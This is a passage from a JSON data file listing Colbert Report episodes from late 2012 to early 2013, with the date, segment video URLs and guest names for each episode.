        "http://thecolbertreport.cc.com/videos/htdpl2/intro---10-9-12",
        "http://thecolbertreport.cc.com/videos/69kfag/president-obama-s-obsessiveness-plea",
        "http://thecolbertreport.cc.com/videos/0g0ihq/smokin--pole---the-quest-for-arctic-riches---china---russia",
        "http://thecolbertreport.cc.com/videos/fu9mpp/mitt-romney-s-vague--long-winded-foreign-threats",
        "http://thecolbertreport.cc.com/videos/fgftvy/morrissey"
      ],
      "guest": "Morrissey"
    },
    {
      "date": "2012-10-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4jb3d3/intro---10-10-12",
        "http://thecolbertreport.cc.com/videos/ejqp1v/beverage-based-polling---pizza-toppings-town-hall",
        "http://thecolbertreport.cc.com/videos/jur0u9/the-word---meducation",
        "http://thecolbertreport.cc.com/videos/t1y0rc/threatdown---apple-fan-bears--drunk-cars---bears",
        "http://thecolbertreport.cc.com/videos/plccwf/naomi-wolf",
        "http://thecolbertreport.cc.com/videos/od1her/sign-off----vagina--a-new-biography-"
      ],
      "guest": "Naomi Wolf"
    },
    {
      "date": "2012-10-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6smkkc/intro---10-11-12",
        "http://thecolbertreport.cc.com/videos/kiyawb/the-vice-presidential-debate",
        "http://thecolbertreport.cc.com/videos/s190yi/this-changes-everything---obama-s-martian-gayness",
        "http://thecolbertreport.cc.com/videos/2ksunf/formidable-opponent---mitt-romney",
        "http://thecolbertreport.cc.com/videos/xhdwfk/chrystia-freeland",
        "http://thecolbertreport.cc.com/videos/zr1go5/sign-off---goodnight"
      ],
      "guest": "Chrystia Freeland"
    },
    {
      "date": "2012-10-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fuzsdf/intro---10-15-12",
        "http://thecolbertreport.cc.com/videos/0bmyur/supersonic-space-jump",
        "http://thecolbertreport.cc.com/videos/iudpa7/tip-wag---norway---american-family-association",
        "http://thecolbertreport.cc.com/videos/0q2emr/monkey-on-the-lam---florida---monkey-on-the-gram",
        "http://thecolbertreport.cc.com/videos/zj6xib/evan-thomas",
        "http://thecolbertreport.cc.com/videos/n0kt18/sign-off---goodnight"
      ],
      "guest": "Evan Thomas"
    },
    {
      "date": "2012-10-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/keo9r0/the-wealth-edge----cool--debate-technology",
        "http://thecolbertreport.cc.com/videos/4aqbh6/affirmative-action-supreme-court-case",
        "http://thecolbertreport.cc.com/videos/y46z6y/affirmative-action-supreme-court-case---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/4uld4g/paul-ryan-s-phony-campaign-photo",
        "http://thecolbertreport.cc.com/videos/4c7frp/cory-booker",
        "http://thecolbertreport.cc.com/videos/juen77/sign-off---iphone"
      ],
      "guest": "Cory Booker"
    },
    {
      "date": "2012-10-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wd584x/second-presidential-debate-showdown",
        "http://thecolbertreport.cc.com/videos/rjvmac/libya-gate-scandal",
        "http://thecolbertreport.cc.com/videos/j531em/stupid-town-hall-topics",
        "http://thecolbertreport.cc.com/videos/jr7tf6/mitt-s-greatest-debate-triumph",
        "http://thecolbertreport.cc.com/videos/hhxtxg/alpha-dog-of-the-week---scott-desjarlais",
        "http://thecolbertreport.cc.com/videos/f4jil4/tyler-perry",
        "http://thecolbertreport.cc.com/videos/namywp/sign-off---loose-teeth"
      ],
      "guest": "Tyler Perry"
    },
    {
      "date": "2012-10-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1dfeya/celebrity-campaign-endorsements",
        "http://thecolbertreport.cc.com/videos/rgzljg/mitt-s-first-day",
        "http://thecolbertreport.cc.com/videos/2q39xi/junk-food-feed",
        "http://thecolbertreport.cc.com/videos/xttei6/special-report---a-shucking-disaster---nightmare-at-the-mitchell-corn-palace",
        "http://thecolbertreport.cc.com/videos/t8vgd4/the-killers",
        "http://thecolbertreport.cc.com/videos/ieuitc/sign-off----battle-born-"
      ],
      "guest": "The Killers"
    },
    {
      "date": "2012-10-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0t7wmw/virginia-s-voter-fraud-fighter",
        "http://thecolbertreport.cc.com/videos/jhyr4v/ceo-blackmail---fec-consent",
        "http://thecolbertreport.cc.com/videos/t1yx0h/governor-magorium-s-ganja-emporium",
        "http://thecolbertreport.cc.com/videos/8uddyg/donald-sadoway",
        "http://thecolbertreport.cc.com/videos/czceut/sign-off---goodnight"
      ],
      "guest": "Donald Sadoway"
    },
    {
      "date": "2012-10-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nept6x/stephen-colbert-s-debate-2012-coverage",
        "http://thecolbertreport.cc.com/videos/wowfoq/elusive--mysterious--undecided-voters",
        "http://thecolbertreport.cc.com/videos/twexhe/lance-armstrong-s-doping-scandal",
        "http://thecolbertreport.cc.com/videos/hrawp4/john-grisham",
        "http://thecolbertreport.cc.com/videos/rxk7z1/sign-off---manischewitz"
      ],
      "guest": "John Grisham"
    },
    {
      "date": "2012-10-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3gbfdl/intro---10-24-12",
        "http://thecolbertreport.cc.com/videos/ifrr4g/donald-trump-s-october-surprise",
        "http://thecolbertreport.cc.com/videos/n9028e/nonstop-libya-gate-questions",
        "http://thecolbertreport.cc.com/videos/gzidte/richard-mourdock-s-rape-comment",
        "http://thecolbertreport.cc.com/videos/swkt4w/anthony-everitt",
        "http://thecolbertreport.cc.com/videos/ug2zqb/sign-off---gop-rape-mention-tally"
      ],
      "guest": "Anthony Everitt"
    },
    {
      "date": "2012-10-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7k4pkh/intro---10-25-12",
        "http://thecolbertreport.cc.com/videos/a0h9on/voting---hormones",
        "http://thecolbertreport.cc.com/videos/zu00re/stephen-ghoulbert-s-spooky-time-halloween-fun-guide---tom-hanks",
        "http://thecolbertreport.cc.com/videos/pb058e/mitch-daniels-pt--1",
        "http://thecolbertreport.cc.com/videos/9tzl4i/mitch-daniels-pt--2",
        "http://thecolbertreport.cc.com/videos/pstvp6/sign-off---murderer-skull-model"
      ],
      "guest": "Gov. Mitch Daniels"
    },
    {
      "date": "2012-10-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rky5ab/hurricane-sandy-s-aftermath",
        "http://thecolbertreport.cc.com/videos/ey2jqz/hurricane-sandy---election-day",
        "http://thecolbertreport.cc.com/videos/lk60fg/flamboyant-sandy---federal-relief-debate",
        "http://thecolbertreport.cc.com/videos/5vx4ad/donald-trump-s-october-surprise-extension",
        "http://thecolbertreport.cc.com/videos/x89ju7/lilly-ledbetter",
        "http://thecolbertreport.cc.com/videos/jqfgo3/sign-off---american-red-cross---hurricane-sandy"
      ],
      "guest": "Lilly Ledbetter"
    },
    {
      "date": "2012-11-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hk2ox4/intro---11-1-12",
        "http://thecolbertreport.cc.com/videos/mtuxrh/hurricane-sandy-traffic-ordeal",
        "http://thecolbertreport.cc.com/videos/pdmw4z/tip-wag---constant-documentation---billy-graham",
        "http://thecolbertreport.cc.com/videos/rmzkbz/david-byrne---st--vincent",
        "http://thecolbertreport.cc.com/videos/w4v4gd/sign-off---american-red-cross---hurricane-sandy"
      ],
      "guest": "David Byrne &amp; St. Vincent"
    },
    {
      "date": "2012-11-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mm7c7b/colbert-super-pac---severe-candidate-warning",
        "http://thecolbertreport.cc.com/videos/h3qcht/shame-based-campaigning",
        "http://thecolbertreport.cc.com/videos/ga4hky/shame-based-campaigning---sasha-issenberg",
        "http://thecolbertreport.cc.com/videos/ef460s/-razor-tight--presidential-election",
        "http://thecolbertreport.cc.com/videos/tl7vb4/nate-silver",
        "http://thecolbertreport.cc.com/videos/i1cdch/sign-off---go-vote-"
      ],
      "guest": "Nate Silver"
    },
    {
      "date": "2012-11-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2wfr8k/the-colbert-report-election-2012---who-will-replace-obama---012",
        "http://thecolbertreport.cc.com/videos/ydqq2x/the-colbert-report-election-2012---too-close-to-call",
        "http://thecolbertreport.cc.com/videos/b9hvj6/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/vghwne/senate-races---state-referenda",
        "http://thecolbertreport.cc.com/videos/cao81i/sign-off---election-reflections"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2012-11-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d96ihg/intro---11-7-12",
        "http://thecolbertreport.cc.com/videos/zviz5s/four-more-years-of-hopey-change",
        "http://thecolbertreport.cc.com/videos/hbkurh/nontraditional-non-white-america",
        "http://thecolbertreport.cc.com/videos/btqtta/polling-irregularities---vote-by-phone-scam",
        "http://thecolbertreport.cc.com/videos/wjevw3/wind-power-s-health-hazards",
        "http://thecolbertreport.cc.com/videos/xs8d72/doris-kearns-goodwin",
        "http://thecolbertreport.cc.com/videos/6iwo2a/sign-off---solace-in-a-bottle"
      ],
      "guest": "Doris Kearns Goodwin"
    },
    {
      "date": "2012-11-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lttdhm/intro---11-8-12",
        "http://thecolbertreport.cc.com/videos/op51y2/nor-easter---mitt-romney",
        "http://thecolbertreport.cc.com/videos/ryj0jw/difference-makers---stephen-dick-jr-",
        "http://thecolbertreport.cc.com/videos/25lwb9/the-plight-of-platonic-relationships",
        "http://thecolbertreport.cc.com/videos/doygtf/rachel-maddow",
        "http://thecolbertreport.cc.com/videos/jzxfgf/sign-off---goodnight"
      ],
      "guest": "Rachel Maddow"
    },
    {
      "date": "2012-11-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3szdub/david-petraeus-s--all-in--affair",
        "http://thecolbertreport.cc.com/videos/kj1cs9/colbert-super-pac-shh----karl-rove---jon-stewart",
        "http://thecolbertreport.cc.com/videos/66y7dx/colbert-super-pac-shh----secret-second-501c4---trevor-potter",
        "http://thecolbertreport.cc.com/videos/tl4uce/blitzkrieg-on-grinchitude---santa-s-pipe",
        "http://thecolbertreport.cc.com/videos/6vpcf3/ken-burns",
        "http://thecolbertreport.cc.com/videos/3w1i4s/sign-off---goodbye-colbert-super-pac"
      ],
      "guest": "Ken Burns"
    },
    {
      "date": "2012-11-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i9yvhl/intro---11-13-12",
        "http://thecolbertreport.cc.com/videos/uml8yd/2072--race-to-the-white-orb",
        "http://thecolbertreport.cc.com/videos/s5vmrx/tip-wag---pranab-mukherjee--brazilian-scientists--sonia-sotomayor",
        "http://thecolbertreport.cc.com/videos/icmpvx/newt-gingrich-pt--1",
        "http://thecolbertreport.cc.com/videos/61deqz/newt-gingrich-pt--2",
        "http://thecolbertreport.cc.com/videos/ujlf67/sign-off---goodnight"
      ],
      "guest": "Newt Gingrich"
    },
    {
      "date": "2012-11-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e0pxrk/intro---11-14-12",
        "http://thecolbertreport.cc.com/videos/3zu15f/who-s-attacking-me-now----canadian-broadcasting-corporation",
        "http://thecolbertreport.cc.com/videos/kvs6wn/high-frequency-trading",
        "http://thecolbertreport.cc.com/videos/ba8i6j/high-frequency-trading---christopher-steiner",
        "http://thecolbertreport.cc.com/videos/wvf1nd/tony-kushner-pt--1",
        "http://thecolbertreport.cc.com/videos/ezygjv/tony-kushner-pt--2",
        "http://thecolbertreport.cc.com/videos/cz0sty/sign-off---goodnight"
      ],
      "guest": "Tony Kushner"
    },
    {
      "date": "2012-11-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cazbp6/intro---11-15-12",
        "http://thecolbertreport.cc.com/videos/regxdh/millennial-generation-soup-campaign",
        "http://thecolbertreport.cc.com/videos/jy83mg/general-s-hospital",
        "http://thecolbertreport.cc.com/videos/xve006/cheating-death---flu-fighting-meth",
        "http://thecolbertreport.cc.com/videos/we1zlp/chris-stringer",
        "http://thecolbertreport.cc.com/videos/f23a7f/sign-off---the-colbert-report-s-seventh-anniversary"
      ],
      "guest": "Chris Stringer"
    },
    {
      "date": "2012-11-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9ex0kp/intro---11-26-12",
        "http://thecolbertreport.cc.com/videos/i4lmrj/stephen-s-thanksgiving---holy-black-friday",
        "http://thecolbertreport.cc.com/videos/242ato/judge--jury---executioner---copyright-law",
        "http://thecolbertreport.cc.com/videos/ob3lcn/blitzkrieg-on-grinchitude---pope-benedict-xvi",
        "http://thecolbertreport.cc.com/videos/std5aq/jake-tapper",
        "http://thecolbertreport.cc.com/videos/o2lec3/sign-off---goodnight"
      ],
      "guest": "Jake Tapper"
    },
    {
      "date": "2012-11-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oh9w4r/canada-s-grinch",
        "http://thecolbertreport.cc.com/videos/7imsna/the-fiscal-cliff-compromise",
        "http://thecolbertreport.cc.com/videos/72sdt0/the-fiscal-cliff-compromise---reihan-salam",
        "http://thecolbertreport.cc.com/videos/1fuekz/dolly-parton",
        "http://thecolbertreport.cc.com/videos/nqrlrq/sign-off---country-chords"
      ],
      "guest": "Dolly Parton"
    },
    {
      "date": "2012-11-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ui3lan/intro---11-28-12",
        "http://thecolbertreport.cc.com/videos/omvkv3/record-powerball-jackpot",
        "http://thecolbertreport.cc.com/videos/tnr1l8/the-word---sisters-are-doing-it-to-themselves",
        "http://thecolbertreport.cc.com/videos/xpxkwl/filibuster-reform",
        "http://thecolbertreport.cc.com/videos/qc393o/frank-oz",
        "http://thecolbertreport.cc.com/videos/b9jkcc/sign-off---stephen-s-muppet"
      ],
      "guest": "Frank Oz"
    },
    {
      "date": "2012-11-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gnb0gv/intro---11-29-12",
        "http://thecolbertreport.cc.com/videos/cehmsr/moon-shattering-news",
        "http://thecolbertreport.cc.com/videos/9o0ttj/tip-wag---gay-rights-pioneers---gun-dorms",
        "http://thecolbertreport.cc.com/videos/dgy710/top-10-of-2012---operation-killing--killing-kennedy-",
        "http://thecolbertreport.cc.com/videos/qyxymb/sean-carroll",
        "http://thecolbertreport.cc.com/videos/z8pd91/sign-off---acceptance-speech"
      ],
      "guest": "Sean Carroll"
    },
    {
      "date": "2012-12-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c2msxt/the-pundit--or-colbert-and-back-again",
        "http://thecolbertreport.cc.com/videos/i94qww/the-pundit--or-colbert-and-back-again---hobbit-week-lineup",
        "http://thecolbertreport.cc.com/videos/zkpe65/the-word---base-instincts",
        "http://thecolbertreport.cc.com/videos/47ssk7/senior-moment---granny-pods",
        "http://thecolbertreport.cc.com/videos/zm84yu/ian-mckellen",
        "http://thecolbertreport.cc.com/videos/u8z3mx/sign-off---the-pundit--or-colbert-and-back-again---sting"
      ],
      "guest": "Ian McKellen"
    },
    {
      "date": "2012-12-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ri5csw/the-pundit--or-colbert-and-back-again---hobbit-week-night-two",
        "http://thecolbertreport.cc.com/videos/q3aiti/low-t---low-o",
        "http://thecolbertreport.cc.com/videos/n7lg1x/kate-the-great-s-morning-sickness",
        "http://thecolbertreport.cc.com/videos/v8syf8/martin-freeman",
        "http://thecolbertreport.cc.com/videos/rmahy7/sign-off---the-pundit--or-colbert-and-back-again---rivendell"
      ],
      "guest": "Martin Freeman"
    },
    {
      "date": "2012-12-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qtkdcn/the-pundit--or-colbert-and-back-again---hobbit-week-night-three",
        "http://thecolbertreport.cc.com/videos/6x66a7/the-word---hire-learning",
        "http://thecolbertreport.cc.com/videos/9j5qtc/politicos---paranoid-fantasies",
        "http://thecolbertreport.cc.com/videos/m8dp2f/andy-serkis",
        "http://thecolbertreport.cc.com/videos/msip4s/sign-off---the-pundit--or-colbert-and-back-again---one-ring"
      ],
      "guest": "Peter Jackson"
    },
    {
      "date": "2012-12-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/teluzg/the-pundit--or-colbert-and-back-again---hobbit-week-night-four",
        "http://thecolbertreport.cc.com/videos/hhe4hg/jim-demint-s-resignation",
        "http://thecolbertreport.cc.com/videos/d0n0vz/stephen-colbert--wax-on---wax-off-at-madame-tussauds-pt--1",
        "http://thecolbertreport.cc.com/videos/1voj50/stephen-colbert--wax-on---wax-off-at-madame-tussauds-pt--2",
        "http://thecolbertreport.cc.com/videos/0tvck8/peter-jackson",
        "http://thecolbertreport.cc.com/videos/fbqohj/sign-off---the-pundit--or-colbert-and-back-again---hobbit-week-concludes"
      ],
      "guest": "Andy Serkis"
    },
    {
      "date": "2012-12-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0cfmll/stephen-for-u-s--senate",
        "http://thecolbertreport.cc.com/videos/8skoq2/fox-news-s-secret-presidential-recruit",
        "http://thecolbertreport.cc.com/videos/gdygvq/diana-krall"
      ],
      "guest": "Diana Krall, Elvis Costello"
    },
    {
      "date": "2012-12-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t45azb/intro---12-11-12",
        "http://thecolbertreport.cc.com/videos/69xjmc/fiscal-cliff-negotiations",
        "http://thecolbertreport.cc.com/videos/iwvp9d/threatdown---commie-unicorns---foreman-barbie",
        "http://thecolbertreport.cc.com/videos/8is78z/ex-gay-therapy-debate",
        "http://thecolbertreport.cc.com/videos/m3omdi/malcolm-gladwell"
      ],
      "guest": "Malcolm Gladwell, Audra McDonald"
    },
    {
      "date": "2012-12-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hoair6/success-for-operation-killing--killing-kennedy-",
        "http://thecolbertreport.cc.com/videos/8aazot/stephen-s-appointment-with-destiny---jeff-bingaman",
        "http://thecolbertreport.cc.com/videos/yr83zl/ground-zero-mosque-erade",
        "http://thecolbertreport.cc.com/videos/38iv8s/mandy-patinkin"
      ],
      "guest": "Mandy Patinkin, Michael Stipe"
    },
    {
      "date": "2012-12-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ao4d2q/hurricane-sandy-mega-concert",
        "http://thecolbertreport.cc.com/videos/dseos2/uncensored----breaking-abbey-",
        "http://thecolbertreport.cc.com/videos/clpvpj/colbert-super-pac---the-ham-rove-memorial-fund",
        "http://thecolbertreport.cc.com/videos/wozbhp/simone-campbell"
      ],
      "guest": "Sister Simone Campbell, Jeff Tweedy, Mavis Staples, Sean Lennon"
    }
  ],
  "2013": [
    {
      "date": "2013-01-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bgkrwx/intro---1-7-13",
        "http://thecolbertreport.cc.com/videos/83h5da/stephen-s-holiday-break",
        "http://thecolbertreport.cc.com/videos/9nmhtf/fiscal-cliff-deal---disincentives",
        "http://thecolbertreport.cc.com/videos/wq7dip/the-platinum-debt-ceiling-solution",
        "http://thecolbertreport.cc.com/videos/b1uvtc/blood-in-the-water---bill-o-reilly-s-racial-insensitivity",
        "http://thecolbertreport.cc.com/videos/ayoamg/jimmy-wales",
        "http://thecolbertreport.cc.com/videos/a1dzb3/sign-off---goodnight"
      ],
      "guest": "Jimmy Wales"
    },
    {
      "date": "2013-01-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fuxwr9/intro---1-8-13",
        "http://thecolbertreport.cc.com/videos/gdcdgs/postage-price-hike",
        "http://thecolbertreport.cc.com/videos/vcqeg7/cheating-death---rage---blood-transfusions",
        "http://thecolbertreport.cc.com/videos/ps8djx/bin-laden-film-controversy",
        "http://thecolbertreport.cc.com/videos/kq9pp2/chris-kluwe",
        "http://thecolbertreport.cc.com/videos/gcv2eh/sign-off---vacsa-tern"
      ],
      "guest": "Chris Kluwe"
    },
    {
      "date": "2013-01-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kg1znk/intro---1-9-13",
        "http://thecolbertreport.cc.com/videos/ip7ql9/idaho-s-walled---armed-community",
        "http://thecolbertreport.cc.com/videos/tzcfhr/gun-control-backlash",
        "http://thecolbertreport.cc.com/videos/52uula/thought-for-food---wheat-addictions",
        "http://thecolbertreport.cc.com/videos/ysa6lr/neil-shubin",
        "http://thecolbertreport.cc.com/videos/5majke/sign-off---mcgnaw-the-gluten-free-beaver"
      ],
      "guest": "Neil Shubin"
    },
    {
      "date": "2013-01-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uej3ac/roadside-sofa-boning",
        "http://thecolbertreport.cc.com/videos/5n5w35/obama-s-failed-second-term",
        "http://thecolbertreport.cc.com/videos/35sqrd/tip-wag---hapifork---kevin-garnett",
        "http://thecolbertreport.cc.com/videos/ro7hjf/benjamin-gibbard"
      ],
      "guest": "Ben Gibbard"
    },
    {
      "date": "2013-01-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y2ynrh/stephen-colbert-s-double-barrel-blam-o-rama---silver-bullets---video-games",
        "http://thecolbertreport.cc.com/videos/8zsm19/stephen-colbert-s-double-barrel-blam-o-rama---piers-morgan---james-yeager",
        "http://thecolbertreport.cc.com/videos/zftq7q/stephen-colbert-s-double-barrel-blam-o-rama---guns-as-civil-rights-victims",
        "http://thecolbertreport.cc.com/videos/4lcqtx/vitaminwater-advertising-lawsuit",
        "http://thecolbertreport.cc.com/videos/bainem/piers-morgan",
        "http://thecolbertreport.cc.com/videos/hoc2kn/sign-off---pocketbook-constitution"
      ],
      "guest": "Piers Morgan"
    },
    {
      "date": "2013-01-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t6cye7/intro---1-15-13",
        "http://thecolbertreport.cc.com/videos/p5ll7c/lance-armstrong-s-interview-with-oprah",
        "http://thecolbertreport.cc.com/videos/uuduw3/monkey-on-the-lam---macaque-attack---1-381-days-of-simian-terror-in-tampa",
        "http://thecolbertreport.cc.com/videos/r78s3t/catacoffin-catacombo-sound-system",
        "http://thecolbertreport.cc.com/videos/an9lge/jared-diamond",
        "http://thecolbertreport.cc.com/videos/usj2pz/sign-off---goodnight"
      ],
      "guest": "Jared Diamond"
    },
    {
      "date": "2013-01-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j56lbb/intro---1-16-13",
        "http://thecolbertreport.cc.com/videos/s9aj13/healthy-fake-smiles",
        "http://thecolbertreport.cc.com/videos/uhkynp/hsbc-laundering-charges",
        "http://thecolbertreport.cc.com/videos/hbxrk6/hsbc-laundering-charges---matt-taibbi",
        "http://thecolbertreport.cc.com/videos/62nu7n/pat-robertson-s-romance-advice",
        "http://thecolbertreport.cc.com/videos/m7jh2f/tom-brokaw",
        "http://thecolbertreport.cc.com/videos/ib0ftp/sign-off---goodnight"
      ],
      "guest": "Tom Brokaw"
    },
    {
      "date": "2013-01-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r3kb1q/exclusive---colbert-wax-on---wax-off-at-madame-tussauds--outtakes",
        "http://thecolbertreport.cc.com/videos/qqx0s8/corporate-scamwich",
        "http://thecolbertreport.cc.com/videos/df7rup/obama-s-gun-grab",
        "http://thecolbertreport.cc.com/videos/w73nzv/the-word---united-we-standoff",
        "http://thecolbertreport.cc.com/videos/g1jrq5/porn-names---porn-lawsuits",
        "http://thecolbertreport.cc.com/videos/vem33s/akhil-reed-amar",
        "http://thecolbertreport.cc.com/videos/jawwj8/sign-off---goodnight"
      ],
      "guest": "Akhil Reed Amar"
    },
    {
      "date": "2013-01-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zzot6e/intro---1-21-13",
        "http://thecolbertreport.cc.com/videos/xjexam/obama-s-second-inauguration",
        "http://thecolbertreport.cc.com/videos/li25sm/stephen-s-re-inauguration",
        "http://thecolbertreport.cc.com/videos/djvjxw/threatdown---flu--kate-middleton--vomiting-robots--superintelligent-gonorrhea--bears",
        "http://thecolbertreport.cc.com/videos/o7bw1e/ta-nehisi-coates",
        "http://thecolbertreport.cc.com/videos/9hwods/sign-off---hotel-bibles"
      ],
      "guest": "Ta-Nehisi Coates"
    },
    {
      "date": "2013-01-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u2sxvp/exclusive---kathryn-bigelow-extended-interview",
        "http://thecolbertreport.cc.com/videos/4h7ltu/obama-s-inauguration---class-warfare",
        "http://thecolbertreport.cc.com/videos/0f673t/the-word---win--lose--or-redraw",
        "http://thecolbertreport.cc.com/videos/tccphp/dustin-hoffman-s-bad-news",
        "http://thecolbertreport.cc.com/videos/rn0fho/kathryn-bigelow",
        "http://thecolbertreport.cc.com/videos/msaso2/sign-off----zero-dark-thirty-----quartet-"
      ],
      "guest": "Kathryn Bigelow"
    },
    {
      "date": "2013-01-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3reklz/beyonce-s-lip-gate",
        "http://thecolbertreport.cc.com/videos/vw3zie/tip-wag---montpelier-school-district--theatlasphere-com---florida-officials",
        "http://thecolbertreport.cc.com/videos/f3o0qj/alpha-dog-of-the-week---virginia-state-senate-republicans",
        "http://thecolbertreport.cc.com/videos/202a1c/sally-field",
        "http://thecolbertreport.cc.com/videos/hd80sm/sign-off---goodnight"
      ],
      "guest": "Sally Field"
    },
    {
      "date": "2013-01-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xaaxud/france---the-mali-conflict",
        "http://thecolbertreport.cc.com/videos/i1sdq5/france---the-mali-conflict---edward-berenson",
        "http://thecolbertreport.cc.com/videos/vgqq4z/benghazi-attack-hearing",
        "http://thecolbertreport.cc.com/videos/ktiaje/tavi-gevinson",
        "http://thecolbertreport.cc.com/videos/scixor/sign-off---stephen-s-makeover"
      ],
      "guest": "Tavi Gevinson"
    },
    {
      "date": "2013-01-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q1iuxz/intro---1-28-13",
        "http://thecolbertreport.cc.com/videos/27at9z/rapiscan-scanners",
        "http://thecolbertreport.cc.com/videos/mm5bdz/the-word---the-new-abnormal",
        "http://thecolbertreport.cc.com/videos/0q31iw/the-axis-of-evil-of-the-week---north-korea",
        "http://thecolbertreport.cc.com/videos/qdf7ec/michael-shellenberger",
        "http://thecolbertreport.cc.com/videos/tquuvs/sign-off---goodnight"
      ],
      "guest": "Michael Shellenberger"
    },
    {
      "date": "2013-01-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4ax2hi/intro---1-29-13",
        "http://thecolbertreport.cc.com/videos/81oaln/iran-s-space-monkey---america-s-ape-moratorium",
        "http://thecolbertreport.cc.com/videos/k95k9v/gun-control---state-sovereignty",
        "http://thecolbertreport.cc.com/videos/7c8y4f/gun-control---state-sovereignty---cliff-sloan",
        "http://thecolbertreport.cc.com/videos/gfoq4g/guantanamo-bay-office-closure",
        "http://thecolbertreport.cc.com/videos/jtkgrc/george-saunders",
        "http://thecolbertreport.cc.com/videos/jzuerq/sign-off----tenth-of-december-"
      ],
      "guest": "George Saunders"
    },
    {
      "date": "2013-01-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/omljip/intro---1-30-13",
        "http://thecolbertreport.cc.com/videos/drdd3e/coming-out-benefits---gay-rights",
        "http://thecolbertreport.cc.com/videos/qnfsur/the-word---it-gets-worse",
        "http://thecolbertreport.cc.com/videos/i6hr57/non-racist-kkk",
        "http://thecolbertreport.cc.com/videos/kiwt0s/bill-gates",
        "http://thecolbertreport.cc.com/videos/4wroqd/sign-off---goodnight"
      ],
      "guest": "Bill Gates"
    },
    {
      "date": "2013-01-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/101faw/sport-report---ads-for-ads---deer-antler-spray",
        "http://thecolbertreport.cc.com/videos/odn1pg/sport-report---gatorade-chemicals---chicken-wing-shortage",
        "http://thecolbertreport.cc.com/videos/7wymxs/craziest-f--king-thing-i-ve-ever-heard---crows-using-tools",
        "http://thecolbertreport.cc.com/videos/v42kz3/matthew-guerrieri",
        "http://thecolbertreport.cc.com/videos/o489no/sign-off---welcome-baby-sanchez-"
      ],
      "guest": "Matthew Guerrieri"
    },
    {
      "date": "2013-02-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iyrevo/intro---2-4-13",
        "http://thecolbertreport.cc.com/videos/kb76z3/super-bowl-xlvii",
        "http://thecolbertreport.cc.com/videos/vow0uy/bipartisan-immigration-reform",
        "http://thecolbertreport.cc.com/videos/ur7z4s/skeet-shooting-skeptics",
        "http://thecolbertreport.cc.com/videos/qxsatq/sonia-sotomayor",
        "http://thecolbertreport.cc.com/videos/cmttl3/sign-off---second-amendment"
      ],
      "guest": "Justice Sonia Sotomayor"
    },
    {
      "date": "2013-02-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2316uc/intro---2-5-13",
        "http://thecolbertreport.cc.com/videos/e96s3c/royal-remains",
        "http://thecolbertreport.cc.com/videos/t6wn9f/tip-wag---drunk-donating----the-job--reality-show",
        "http://thecolbertreport.cc.com/videos/a1z0cu/california-s-heroic-hitchhiker",
        "http://thecolbertreport.cc.com/videos/dyxduh/julie-andrews",
        "http://thecolbertreport.cc.com/videos/y7gdjs/sign-off---final-rose"
      ],
      "guest": "Julie Andrews"
    },
    {
      "date": "2013-02-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ae7fmq/intro---2-6-13",
        "http://thecolbertreport.cc.com/videos/33sahu/the-penny-pinch",
        "http://thecolbertreport.cc.com/videos/r6xbr9/stephen-s-sister-for-congress",
        "http://thecolbertreport.cc.com/videos/07240r/scientology-church-violence",
        "http://thecolbertreport.cc.com/videos/acokbc/lawrence-wright",
        "http://thecolbertreport.cc.com/videos/kt2abh/sign-off---watermelon-warning"
      ],
      "guest": "Lawrence Wright"
    },
    {
      "date": "2013-02-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/14j8d1/intro---2-7-13",
        "http://thecolbertreport.cc.com/videos/k4xzoo/winter-storm-nemo",
